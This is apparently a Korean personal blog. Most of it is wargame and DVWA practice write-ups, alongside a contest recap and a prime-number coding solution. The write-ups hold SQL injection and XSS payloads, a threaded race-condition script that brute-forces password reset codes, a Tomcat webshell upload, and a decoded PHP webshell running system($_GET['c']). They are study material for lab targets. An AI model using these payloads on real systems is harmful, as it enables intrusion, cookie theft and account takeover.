SlowTurtle

2022 클라우드 아이디어 공모전 후기

SlowTurtle_ — Sat, 28 Jan 2023 14:43:09 +0900

공모전 : http://www.busanit.or.kr/board/view.asp?bidx=13463&bcode=notice&ipage=1&sword=&search_txt=

http://busanit.or.kr/uploads/EditorIMG/20220927090450.jpg

부산광역시에서 주최하고 (재)부산정보산업진흥원, 더존비즈온, 카카오엔터프라이즈에서 공동으로 주관한 클라우드 아이디어 공모전에 참여했다.

지원 배경

금융권에 관심이 있었고 코로나 시대에서 중요성이 높아졌던 클라우드에 눈길이 갔었다. 꼭 공부해보고싶은 분야였는데 사회복무요원과 알바, 자격증까지 챙기느라 점점 미뤄만 왔었는데 우연히 공모전을 보고 도전을 해봐야겠다는 생각이 들었다. 목표가 생겼으니 한 번 도전해보자. 라는 생각으로 신청했다.

과정

앞서 말했듯이 하는 것이 너무 많아 공모전에 쓸 시간이 그렇게 여유롭지는 못했다. 최대한을 끌어올리기 위해서 운동을 끊고 잠을 줄였다. 아이디어 선정에 따라 달라질 수 있기에 여러가지 아이디어 중 한 가지를 선정하여 진행했다.

공모전 신청서 및 제안서는 아이디어 제안 배경, 필요성, 목적을 기재하였고 세부 제안 아이디어에 대한 내용과 최종 산출 예상 결과를 작성하였다. 클라우드 아키텍처 구성도를 제작하여 제안서를 작성하였고 아이디어를 구현한 산출물의 특징과 구현 계획, 서비스 구현 과정에서 발생할 수 있는 장애 요소 및 해결방안, 산출물의 기대효과를 제시하여 제출하였다.

클라우드를 공부하면서 아키텍처를 직접 설계해보았다. 아직 부족한 실력이라 고민도 많이하고 팀원들과 상의도 하며 설계한 아키텍처라서 기억에 잘 남는 것 같다.

1차 서류 ! 합 격 !

지원했을 때는 클라우드에 대해 공부하는 좋은 경험만 쌓자. 이었는데 막상 1차 서류심사 결과일정이 되니 긴장이 됐다. 기간이 지났는데 나오지 않아서 떨어졌나보다하고 아쉬워하고 있었는데, 팀원에게 ?? 우리 1차 서류 합격했는데?? 라고 연락이 왔다... 기뻤다 매우 기뻐서 말로 표현이 안됐다. 발표가 바로 다음주라서 어서 발표 ppt를 제작하고 준비를 했다.

발 표 심 사

2차 발표심사는 줌으로 진행됐다. 12팀의 발표를 하루에 끝내려다보니 시간제한 10분이 있었다. 발표를 진행하는 중 2분 남았다는 멘트에 발표속도가 올라갔고 마지막인 기대효과까지 말하며 끝이 났다. Q&A 시간 때 심사위원님께서 아이디어가 신박하다고 칭찬해주셔서 오? 잘하면 수상까지.. 갈 수도..? 라는 기대를 하며 팀원들과 고생많았다고 웃으며 대화했다.

최우수상 수상 !

발표심사를 받은 12팀 중 수상팀은 8팀이라 장려상까진 어떻게 해볼 수 있겠는데!! 라며 팀원들이랑 얘기했는데, 꿈이 좋았다. 나만 좋았던 것이 아니라 팀원 또한 꿈이 좋아서 이거 진짜 일낼수도..? 하며 기대에 부풀어 기다렸다.

???

최우수상을 받았다. 열심히 최선을 다해 진행했지만 이렇게 큰 상은 생각하지 못하고 지원했던 것이기에 기쁨은 배가 된 것 같다.

짧은 기간동안 함께 우리 팀장님, 팀원 너무 고생많았다!!!

좋은 목표가 된 공모전이 좋은 결과까지 맺게 되어 감사했고 다음번에 또 다른 공모전을 목표로 더 도전하고 나아가는 계기와 경험이 되었다.

Don't stop !!!

[Dreamhack] file-csp-1

SlowTurtle_ — Fri, 27 Jan 2023 17:25:59 +0900

[Dreamhack] file-csp-1

소스를 을 때 결론적으로 보면 a== ‘error’ and b == ‘error’ and c == ‘c’ and d != ‘error’가 되면 FALG를 얻을 수 있다.

1을 보낸 뒤 소스를 보았다.

어떤 함수의 SHA값을 하나 알 수 있었다. test에서 초기에 script-src ‘unsafe-inline’이 적혀있는데 CSP를 공부했을 때 script-src는 스크립트 관련된 권한 집합을 제어하는 것으로 알고 있었다. 그리고 unsafe-inline은 inline script를 허용한다는 뜻이다. 그렇다면 script-src를 보내보았다.

그랬더니 아무것도 출력되지 않았고 콘솔에서 위 사진을 볼 수 있었다. 4개 함수의 SHA 값인데 뭐가 무엇인지 아직 모른다. 그중 하나는 바로 위에서 확인했던 integrity에서 확인한 SHA 값과 같기에 사용했다. 확인을 위해 하나씩 보내봤다.

script-src 'sha256-P9oV1Sc7O1Di7wEu1Q0fc9Jb2+DopNb6840c7E5XuNY='
script-src 'sha256-Pl2V1+QPNtARvuHPfLjHPFJ5rA0Ky2MhOJ8KD2Y0zN8='
script-src 'sha256-pasqAKBDmFT4eHoN2ndd6lN370kFiGUFyTiUHWhU7k8='
script-src 'sha256-l1OSKODPRVBa1/91J7WfPisrJ6WCxCRnKFzXaOkpsY4=’

우리는 c와 d만 error가 안 뜨면 되니 c와 d만 설정해준다.

script-src 'sha256-pasqAKBDmFT4eHoN2ndd6lN370kFiGUFyTiUHWhU7k8=' 'sha256-l1OSKODPRVBa1/91J7WfPisrJ6WCxCRnKFzXaOkpsY4=’

<TEST>

test에 위에 작성한 그대로 보내서 확인했다.

Verify CSP에서 Test에서 보냈던 그대로 보냈다.

flag를 획득했다.

[Dreamhack] crawling

SlowTurtle_ — Thu, 26 Jan 2023 11:48:45 +0900

[Dreamhack] crawling

<초기 화면>

<app.py>

check_global과 damin_page를 보면 address는 127.0.0.1인지 체크하고 있으므로 address는 127.0.0.1이어야 한다. 가장 밑을 보면 포트는 3333이니 127.0.0.1:3333을 보내보자. 여기서 참고할 점은 PHP는 http://Wrapper를 지원한다. 즉, http://url~와 같은 형태로 넘겨주면 외부 도메인에 있는 리소스를 가져오는 것이다.

소스 코드에서 본 것처럼 check_global을 우회하지 못하여 Can you access my admin page~? 문장이 출력되었다. 127.0.0.1:3333을 외부 ip인 것처럼 다른 url로 변경하여 요청하여 check_global을 우회해보자. url 단축을 이용했다. (https://han.gl/)

http://127.0.0.1:3333을 url 단축 요청을 통해 단축하여 얻은 url을 보냈다.

<단축 url 제출>

flag를 획득했다.

[Dreamhack] login-1

SlowTurtle_ — Wed, 25 Jan 2023 17:06:51 +0900

[Dreamhack] login-1

소스 코드가 길어서 필요한 부분만 가져와봤다.

guest를 0, admin을 1 와 같이 userLevel로 구별하고 있다. /user/useridx useridx로 db에서 가져오는 정보를 볼 수 있다. 권한이 1일 때 /admin페이지를 확인할 수 있다. 이곳에 Flag가 있으니 권한 1을 가지고 있는 계정으로 /admin페이지를 확인하면 Flag값을 얻을 수 있다.

</register>

register에서 가입할 수 있는데 가입하고 나면 backupcode를 준다. 그 backupcode는 100까지의 숫자 중 랜덤하게 부여한다.

</forget_password>

Brute Force공격을 막기 위해 sleep(1)을 걸었다.

<login>

비밀번호가 틀렸다. 그럼 가입을 해보자.

slow/slow/slow로 가입해보니

BackupCode로 18을 부여받았다. 로그인해도 딱히 뭐 시도해 볼 것이 없다. forget_password로 가보자.

이런 형식으로 userid를 입력하고 바꿀 password를 입력한 뒤 가입할 때 제공했던 BackupCode를 적은 뒤 제출하면 password가 변경된다. 그 후 84번이라는 새로운 BackupCode를 받았다.

아까 확인했을 때, /user/useridx에 들어가보자. /user/0부터 들어갔는데, 없단다. 그래서 1부터 들어갔다.

Apple이라는 계정을 알 수 있었는데 UserLevel이 1이다. admin계정이다. 그럼 내 계정은 몇 번째일까 싶어 다 해보니 17번째였다. 18번은 역시 없다.

그럼 위에서 admin계정인 Apple을 알았으니 그 계정을 내가 가질 방법을 생각해보면 Apple의 백업코드를 알아내 내가 바꾸고 싶은 비밀번호로 변경하면 될 것 같았다. 그러나 Brute Force를 막기 위해 sleep(1)을 걸었을 뿐 아니라 5번 틀리면 새로운 백업 코드로 변경되기 때문에 맞출 때까지 시도하는 것이 불가능하다. 그러나 sleep(1)을 설정함에 따라 다른 취약점이 생겼는데 1초 이내에 100번 모두 접근하여 결국 비밀번호가 변경되는 방식으로 레이스 컨디션 취약점을 이용하는 것이다. 버프 슈트를 이용해서 시도했다.

그러나 버프 슈트 Edition버전에서는 속도 제한으로 인해서 intruder로 할 수 없었다. 그래서 간단한 반복문, threading을 통해 파이썬 스크립트를 작성했다.

import threading, requests

url = "http://host3.dreamhack.games:19427/forgot_password"

for i in range(1,101) :
    forget = {"userid": "Apple", "newpassword": "slow", "backupCode": i}
    thread = threading.Thread(target=requests.post, args=(url, forget))

    thread.start()

print("finish")

실행이 끝나며 finish를 출력했으니 Apple/slow로 로그인해보자.

flag값을 획득했다.

[Dreamhack] [wargame.kr] adm1nkyj

SlowTurtle_ — Tue, 24 Jan 2023 16:07:20 +0900

[Dreamhack] [wargame.kr] adm1nkyj

초기화면에서 소스코드를 보여준다.

id를 150번 입력하면 초기화가 된다. 음 id와 pw, flag를 모두 GET 방식으로 보내줘야 진짜 flag 값을 획득할 수 있는 것 같다. 그럼 우선 id부터 알아보자.

?id=’ or 1=1 -- -

Hello 2라는 결과를 출력하였다. 위에서 획득한 id가 2번째 컬럼인 것을 확인했다. 그럼 pw를 구해보자. pw의 컬럼을 확인하기 위해 아래와 같이 보냈다.

?id=%27%20union%20select%201%2C&pw=%2C2%2C3%2C4;%20--%20-

컬럼은 xPw4coaa1sslfe= 임을 확인했고 이것을 이용하여 pw를 구하면

?id=%27%20union%20select%201%2C%28select%20xPw4coaa1sslfe%20from%20findflag_2%29%2C&pw=%2C3%2C4;%20--%20-

pw가 !@SA#$! 임을 알 수 있다.

flag값만 찾으면 되는데 flag는 컬럼의 이름을 모르기 때문에 서브쿼리를 이용해서 구해야 한다. 우선 id는 ’‘으로 아무런 값도 넣지 않고 union보다 from(서브쿼리) 서브쿼리부터 실행시켜 select 1,2,3,4 as a,5으로 [1][2][3][a][5] 컬럼(4 as a를 통해 a가 됌.)을 갖고 union으로 findflag_2결과값들이 [1][2][3][4][5] 들어가고 limit 1,1로 자료를 받는다.(limit는 0부터 시작하므로 limit 시작위치, 반환갯수) as a를 첫 번째 컬럼을 시작으로 바꿔주면서 네 번째 컬럼에 왔을 때 flag값을 받을 수 있었다.

url인코딩 전 코드는 이렇다.

?id=' union select 1,a,3,4,5 from (select 1,2,3,4 as a,5 union select * from findflag_2 limit 1,1) as a %23  |
?id=%27%20union%20select%201,a,3,4,5%20from%20(select%201,2,3,4%20as%20a,5%20union%20select%20*%20from%20findflag_2%20limit%201,1)%20as%20a%20%23

id와 pw, flag를 얻었으니 그대로 보내보자. 그런데 그대로 입력해서 보내면 아무것도 출력해주지 않는다. 왜일까 생각을 해보니 pw에 !#$가 포함된다. 인식시키기 위해서 !#$을 url 인코딩하고 pw에 넣으면 아래와 같다.

?id=adm1ngnngn&pw=%21@SA%23%24%21&flag=N4wxpthJf7GmHXQ9oBZTvCdu5e3DnIUVl2biLsKgEYMrO8j0RFWaPSkcAy16zq

flag값을 획득했다.

[Dreamhack] weblog-1

SlowTurtle_ — Mon, 23 Jan 2023 07:03:57 +0900

[Dreamhack] weblog-1

(이번 글은 사진이 작을 수 있으니 클릭해서 확인하세요!)

초기 화면이다. 5문제를 풀어야 flag를 주는 것 같다. 우선 admin계정의 Pw를 찾기위해 access.txt을 열어봤다.

정렬은 되어 있지만 보기 너무 힘들어서 Excel로 공백을 기준으로 나눈 뒤 의미 없는 열을 지운 뒤 분석했다.

파일을 빠르게 내리면서 보니 초반과 다르게 의심스러운 부분이 있었다.

자세히 보면 1초마다 1개씩일 때도 있지만 많으면 1초에 4번씩 board.php에서 sort파라미터에 32,33,34~ 와 같이 SQL Injection 의심 쿼리를 확인할 수 있었다. 분명 admin과 pasword를 탈취하기 위한 쿼리문도 있을 것이니 더 내려봤다.

클릭해서보세요

(TABLE_NAME, COLUMN_NAME 등 응답 패킷을 기준으로 다 찾았으나 우린 password만 알면 되기에 이곳엔 작성하지 않음.)

이때부터 username과 password가 등장한다.board.php에서 (username+0x3a+password)와 같은 방식으로 32, 33 ~ 1씩 올리며 문자열을 맞추는 식으로 sql쿼리를 보낸다. 분석을 하다 보면 응답 패킷의 길이를 기준으로 쿼리가 참일 때 길이가 1192이고 거짓일 때 길이는 841인 것을 확인할 수 있다.

그렇다면 쿼리문에 username과 password가 들어가고 응답 패킷 길이가 1192인 것을 기준으로 보면 아래와 같다.

아스키코드 값들을 순서대로 모두 모아보면97,100,109,105,110,58,84,104,49,115,95,49,115,95,65,100,109,49,110,95,80,64,83,83,44,103,117,101,115,116,58,103,117,101,115,116 이다. 변환하면

admin:Th1s_1s_Adm1n_P@SS, guest:guest임을 알 수 있다. 값을 넣어보자.

다음 문제! config.php코드를 추출하는데 사용한 페이로드를 찾으면 된다.

누가 봐도 맨 아래 페이로드가 가장 의심스럽다.

page=php://filter/convert.base64-encode/resource=../config.php부터 넣었는데 틀렸다길래 php://filter/convert.base64-encode/resource=../config.php 넣었더니 다음으로 넘어갔다.

LFI 취약점을 통해 코드 실행이니 웹쉘이 먼저 생각났다. /admin/?page=를 필터로 걸어 확인해봤다.

memo.php에 웹쉘을 삽입하여 memo= ~ 보낸 뒤 /var/lib/php/sessions/sess_ag4l8a5tbv8bkgqe9b9ull5732 경로에 로그가 남았다. 웹쉘로 사용된 파일의 경로는 위와 같음으로 답으로 보내봤다.

생성된 웹쉘의 경로는 바로 이전에 찾았던 구문을 이용하면 된다.

GET/admin/?page=memo.php&memo=%3C?php%20function%20m($l,$T=0){$K=date(%27Y-m-d%27);$_=strlen($l);$__=strlen($K);for($i=0;$i%3C$_;$i%2b%2b){for($j=0;$j%3C$__;%20$j%2b%2b){if($T){$l[$i]=$K[$j]^$l[$i];}else{$l[$i]=$l[$i]^$K[$j];}}}return%20$l;}%20m(%27bmha[tqp[gkjpajpw%27)(m(%27%2brev%2bsss%2blpih%2bqthke`w%2bmiecaw*tlt%27),m(%278;tlt$lae`av,%26LPPT%2b5*5$040$Jkp$Bkqj`%26-?w}wpai,%20[CAP_%26g%26Y-?%27));%20?%3E HTTP/1.1

음 근데 url인코딩과 난독화가 되어 보기 힘들다. 보기좋게 정리해보자.

<?php function m($l, $T = 0) {
    $K = date('Y-m-d');
    $_ = strlen($l);
    $__ = strlen($K);
    for ($i = 0;$i < $_;$i++) {
        for ($j = 0;$j < $__;$j++) {
            if ($T) {
                $l[$i] = $K[$j] ^ $l[$i];
            } else {
                $l[$i] = $l[$i] ^ $K[$j];
            }
        }
    }
    return $l;
}
echo m('bmha[tqp[gkjpajpw');
echo m('+rev+sss+lpih+qthke`w+miecaw*tlt');
echo m('8;tlt$lae`av,&LPPT+5*5$040$Jkp$Bkqj`&-?w}wpai, [CAP_&g&Y-?'); 
?>

보기 좋게 정리해놓으면 위와 같다. php를 컴파일해보면

처음부터 잘못된 것 같다. $k에 date(‘Y-m-d’);인데 들어간 값이 없다. date함수로 날짜를 받아서 넣은 것 같다. 웹쉘을 실행한 날짜를 찾아봤다.

2020-06-02임을 확인했다. 그러면 date 대신 2020-06-02를 넣고 다시 컴파일해보자.

file_put_contents/var/www/html/uploads/images.php<?php header("HTTP/1.1 404 Not Found");system($_GET["c"]);

위와 같이 얻을 수 있었다. /var부터 답을 넣어보자.

바로 이전에 웹쉘의 경로를 찾았을 때 경로는 var/www/html/uploads/images.php 이곳이었으니 images.php?를 기준으로 찾은 다음에 시간이 가장 빠른 것을 보면 된다.

images.php경로는 하나밖에 없어서 시간 비교할 필요가 없었다. 명령어는 whoami 임을 알았기에 입력해서 보내면

flag을 획득했다.

[Dreamhack] Tomcat Manager

SlowTurtle_ — Sun, 22 Jan 2023 17:33:21 +0900

[Dreamhack] Tomcat Manager

초기 화면에 사진은 image.jsp?file=working.png을 보면 알 수 있었다. 우선 제공된 파일들을 보자.

<tomcat-users.xml>

Dockerfile을 보면 파일들의 경로가 다 나와있다. image.jsp?file=을 이용하여 저 상대경로로 접근해보자.

<ROOT.war>

ROOT.war또한 안된다. 상대경로로 이것저것 다 해보다가 성공했다. 다른 이름으로 저장 받아서 ROOT1.war로 받았는데 확인할 게 없었다. tomcat-users.xml에 password가 secret이었는데 한 번 같은 방식으로 진행해봤다.

<tomcat-users1.xml>

접속에 성공했고 tomcat-users1.xml로 다운받아 엑셀로 열어봤더니

아까와는 다르게 password를 획득할 수 있었다. 그럼 이걸 관리자페이지로 접근해야 하는 것 같은데 php는 phpmyadmin같은 페이지는 알았지만, tomcat은 몰라서 구글링해보니 manager였다. 그래서 tomcat manager였나보다 바로 /manager로 들어갔더니

비공개가 아닙니다? 일단 아까 얻은 tomcat/P2assw0rd_4_t0mC2tM2nag3r31337로 로그인해봤다.

로그인에 성공했다. 톰캣은 war파일을 업로드할 수 있으니 webshell.war을 올려봤다.

/webshell로 정상적으로 업로드된 것을 알 수 있다. 들어가서 flag를 요청하니

flag를 획득했다.

DVWA(medium) - CSP Bypass, JavaScript

SlowTurtle_ — Sat, 21 Jan 2023 08:19:28 +0900

1. CSP Bypass

CSP를 우회하고 페이지의 자바스크립트를 실행하라.

low때와 비교를 위해 소스코드를 보았다.

<?php

$headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';";

header($headerCSP);

// Disable XSS protections so that inline alert boxes will work
header ("X-XSS-Protection: 0");

# <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>

?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
    " . $_POST['include'] . "
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';

$headerCSP를 보면 unsafe-inline과 nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA= 라는 값을 줘서 이 값을 가지고있어야만 인라인 스크립트가 실행되도록 설정되어있다.

그렇다면 인라인 스크립트에 위 해시값을 넣어 진행해보자.

<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(document.cookie);</script>

위와 같이 쿠키값을 획득할 수 있었다.

2. JavaScript

페이지에 포함된 자바스크립트를 분석하고 조작하여 보호를 우회하여 success를 제출하라.

자바스크립트 코드를 먼저 보았다.

function do_something(e){
	for(var t="",n=e.length-1;n>=0;n--)
    		t+=e[n];
       		return t
}

setTimeout(function(){do_elsesomething("XX")},300);

function do_elsesomething(e){
	document.getElementById("token").value=do_something(e+document.getElementById("phrase").value+"XX")
}

위 코드는 자바스크립트 코드를 임의로 보기좋게 분리해놨다.

코드를 보면 do_somthing함수를 볼 수 있는데 뭔지 몰라서 알아봤더니 인자로 받은 문자열을 역순으로 재배치하는 함수였다. chageme를 인자로 받으면 emegahc로 재배치하는 함수인 것이다.

do_elsesomething을 보면 XX + 인자로 받은 문자열 + XX 이렇게 합친 후 마지막에 do_something함수를 사용하는 것을 알 수 있다. 즉 token의 값이 XX인자로받은문자열XX 의 역순으로 재배치된 값임을 알 수 있었다.

change를 문자열로 보내보자.

토큰이 hidden으로 value="XXeMegnahCXX임을 확인할 수 있었다. 위에 분석한 내용과 일치한다. 그러면 value값에 문자열이 success입력된 것처럼 바꾸면 XXsseccusXX이다. 버프슈트로 패킷을 잡고 변조하여 보내보았다.

성공적으로 실행됨을 알 수 있었다.

DVWA(medium) - DOM XSS, Reflected XSS, Stored XSS

SlowTurtle_ — Fri, 20 Jan 2023 18:02:07 +0900

1. XSS(DOM)

로그인한 사용자의 쿠키를 훔친다.

low때는 <script>alert("1")</script>만을 사용했었다. 그러나 medium에서는 실행되지 않았다.

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

소스코드를 확인해보니 "<script"를 대소문자에 상관없이 확인된다면 default=English로 이동하도록 하는 것을 확인할 수 있었다.

그러나

http://localhost/DVWA-master/vulnerabilities/xss_d/?default=#%3Cscript%3Ealert(1)%3C/script%3E

위와 같이 뒷부분을 #으로 주석처리한다면 실행이 되는 것을 알 수 있다. 이러한 이유는 서버에는 정상적인 html문서를 요청하고 서버에서도 정상적인 html문서를 응답하지만 #은 브라우저가 리로딩 없이 자바스크립트를 불러올 수 있기 때문에 #뒤에 스크립트문은 서버에 전송이 되지 않는다. 따라서 #뒤에 스크립트문이 실행됨을 알 수 있다. 그러면 이제 쿠키값을 받아보겠다.

localhost/DVWA-master/vulnerabilities/xss_d/?default=#<script>alert(document.cookie)</script>

쿠키값을 확인할 수 있었다.

2. XSS(Reflected)

로그인 된 사용자의 쿠키를 훔쳐라.

low때와 차이점을 알아보자. 소스코드를 먼저 보면

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

File Inclusion때 ../를 ....//로 우회했던 것처럼 진행해보겠다. 아래 코드를 넣고 Submit했다.

<scr<script>ipt>alert(document.cookie)</script>

쿠키값을 획득한 것을 확인할 수 있다.

3. XSS (Stored)

내가 선택한 웹 페이지로부터 리다이렉팅을 해라.

low때와 차이점을 알아보기 위해서 low때 했던 방법을 그대로 해봤다.

그래서 소스코드를 확인해보았다.

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

message부분에서 htmlspecialchars라는 처음보는 함수가 있어서 알아봤더니 문자열에서 특정한 특수 문자를 HTML엔티티로 변환하여 XSS공격을 방지하는 함수였다. 그래서 message부분에 <script>와 </script>부분이 필터링 됨을 알았다.

또한 name에서는 <script>를 ' '으로 필터링 함을 알 수 있었다. 그렇다면 name부분에 <script>대신 <scr<script>ipt>를 넣으면 되겠다 생각이 들어 바로 실행해봤다.

<scr<script>ipt>alert(document.cookie)</script>

위 코드를 name에 넣으려했는데 왜인지 글자수 제한이 없는데 <scr<scrip에서 더이상 써지지 않길래 버프슈트를 이용했다.

그결과 쿠키값을 획득할 수 있었다.

[백준] 1929번 - 소수 구하기 파이썬 풀이

SlowTurtle_ — Fri, 20 Jan 2023 15:41:48 +0900

문제 : https://www.acmicpc.net/problem/1929

1929번 - 소수 구하기

풀이

소수를 구하는 문제를 구현하는 것은 어렵지 않으나 코딩테스트에서는 시간초과되기 싶다. 그래서 이번 문제는 에라토스테네스의 체를 먼저 접근해보자. 에라토스테네스의 체란 일정 범위 내에 수열에서 배수들을 제거해 소수만 걸러내는 체를 뜻한다. 예시 코드를 먼저 보자.

M, N = map(int,input().split())

for i in range(2, int(N**0.5)+1):
	if turtle[i] == True:
		for j in range(i*2, N+1, i):
			turtle[j] = False

백준문제에서 나온 예시값처럼 위 코드에서 입력값 M과 N에 각각 3, 16을 넣었다는 가정하에 진행하면

i = 2 일 때, 4부터 2씩 증가하며 False한다.

3	4	5	6
7	8	9	10
11	12	13	14
15	16

i = 3 일 때, 6부터 3씩 증가하며 False한다.

3	4	5	6
7	8	9	10
11	12	13	14
15	16

i = 4 일 때, 8부터 4씩 증가하며 False한다.

3	4	5	6
7	8	9	10
11	12	13	14
15	16

위 표에서 볼 수 있듯이 False처리되지 않은 것은 3, 5, 7, 11, 13이다. 이 값만이 소수임을 확인할 수 있다.

최종 코드

M, N =map(int,input().split())

for i in range(M, N+1):
    if i == 1: # 1은 소수 아님
        continue
    for j in range(2, int(i**0.5)+1):
      if i % j == 0: # 약수가 존재하는지 확인
        break   # 약수 존재한다면 break로 멈춤
    else:
      print(i)

에라토스테네스의 체를 이용하여 푼 최종 코드이다.

Don't stop